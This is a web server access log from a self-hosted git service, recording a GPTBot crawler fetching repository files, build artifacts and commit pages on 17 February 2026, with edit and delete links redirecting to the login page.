"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:03:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:03:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11094] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/update_status.py?display=source" [Client 74.7.227.38] [Length 13178] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/update_status.py" -[17/Feb/2026:17:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26360] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:03:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:17:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:17:03:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 74.7.227.38] [Length 11083] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:03:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:17:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt" -[17/Feb/2026:17:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72043] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:17:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:17:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:17:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:17:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:17:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:17:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:17:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:17:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:17:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10935] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:17:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip?display=source" [Client 74.7.227.38] [Length 11534] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:17:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip?display=source" [Client 74.7.227.38] [Length 11563] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:17:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles" [Client 74.7.227.38] [Length 48924] [Gzip 10.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:17:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles" [Client 74.7.227.38] [Length 24543] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:17:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode/settings.json?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/settings.json" -[17/Feb/2026:17:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 74.7.227.38] [Length 11095] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 74.7.227.38] [Length 11088] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 12774] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" -[17/Feb/2026:17:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 13028] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/App.tsx" -[17/Feb/2026:17:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9933] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:17:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 9835] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:17:03:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/templates/index.html" -[17/Feb/2026:17:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/templates/index.html" -[17/Feb/2026:17:03:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" -[17/Feb/2026:17:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/templates/index.html" -[17/Feb/2026:17:03:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 